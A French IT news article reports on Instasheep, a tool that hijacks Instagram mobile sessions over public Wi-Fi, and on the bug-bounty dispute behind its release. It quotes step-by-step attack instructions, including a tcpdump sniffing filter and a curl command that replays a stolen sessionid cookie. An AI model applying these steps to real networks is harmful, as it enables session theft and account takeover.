15/11/2024
IT-Connect » Actualités » Actu Cybersécurité » Instasheep : Hacker un compte Instagram sur un Wi-Fi !

Actu Cybersécurité

Instasheep : Hacker un compte Instagram sur un Wi-Fi !

Florian BURNEL 0 commentaire

Il y a deux jours, une faille critique a été remontée dans le service de partage de photos et de vidéos « Instagram » au niveau des applications mobiles. Les données transitant entre un client web et les serveurs sont sécurisées (HTTPS), or cela n’est pas le cas lors de l’utilisation de l’application mobile. De ce fait, si un attaquant se positionne entre le client et le serveur notamment au niveau d’un réseau Wi-Fi Public, il peut voir le trafic qui transite et récupérer des informations en « hackant » la session de l’utilisateur.

logo-instagram1Stevie Graham, un développeur Londonien, qui avait remonté ce problème Instagram a décidé de publier « Instasheep » qui permettrait d’exploiter la grand échelle. Pourquoi aurait-il fait cela ? Tout simplement parce que Facebook lui a notifié qu’il ne toucherait pas un centime pour sa découverte, il a donc gentiment révélé l’existence de cette faille sur Twitter et a créé Instasheep.

Toujours d’après Stevie, voici la méthode introduite dans l’outil Instasheep (traduite) :

« - Connectez-vous sur un réseau Wi-Fi Public ou chiffré par WEP après avoir cracké la clé de sécurité WEP

- Mettez votre interface réseau en mode promiscuous afin d'analyser tout le trafic mais en filtrant sur i.instagram.com :

sudo tcpdump -In -i en0 -s 2048 -A dst i.instagram.com

- Patientez en attendant qu'un utilisateur utilise l'application Instagram iOS sur ce même réseau

- Extraire le cookie de l'en-tête de la requête de sortie

- Utiliser les informations récupérées dans un nouveau cookie dans le paramètre "sessionid" en se faisant passer pour un iPhone grâce à la définition du User-Agent :

curl -H 'User-Agent: Instagram 6.0.4 (iPhone6,2; iPhone OS 7_1_1; en_GB; en-GB) AppleWebKit/420+' \ -H 'Cookie: sessionid=REDACTED' \ https://i.instagram.com/api/v1/direct_share/inbox/`

Cela permettra de récupérer la session de l’utilisateur ».

Le co-fondateur d’Instagram, Mike Krieger, a par ailleurs justifié l’absence du HTTPS pour les applications par le fait que cela ralentissait les temps de réponse du à la sécurité, et, qu’Instagram souhaitait mettre en place le HTTPS sans régression au niveau des performances, de la stabilité et de l’expérience utilisateur.

La question que l’on peut se poser : Facebook aurait-il mieux fait de signer un chèque (à quelques zéros…) à Stevie Graham pour la découverte d'une faille de sécurité dans Instagram ?

author avatar
Florian BURNEL Co-founder of IT-Connect
Ingénieur système et réseau, cofondateur d'IT-Connect et Microsoft MVP "Cloud and Datacenter Management". Je souhaite partager mon expérience et mes découvertes au travers de mes articles. Généraliste avec une attirance particulière pour les solutions Microsoft et le scripting. Bonne lecture.
See Full Bio
social network icon social network icon
Partagez cet article Partager sur Twitter Partager sur Facebook Partager sur Linkedin Envoyer par mail

Vous pourrez aussi aimer

WiFiPhisher : Un outil de social engineering qui s’attaque au Wi-Fi

Florian BURNEL 0
Etude Brute force RDP 2023

Brute force : ce honeypot RDP a reçu 3,4 millions de tentatives de connexions en seulement 3 mois

Florian BURNEL 1
Firefox 124 - Faille de sécurité critique - CVE-2024-2615

Passez sur Firefox 124 pour vous protéger de cette faille de sécurité critique (CVE-2024-2615) !

Florian BURNEL 0

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *

Ce site utilise Akismet pour réduire les indésirables. En savoir plus sur comment les données de vos commentaires sont utilisées.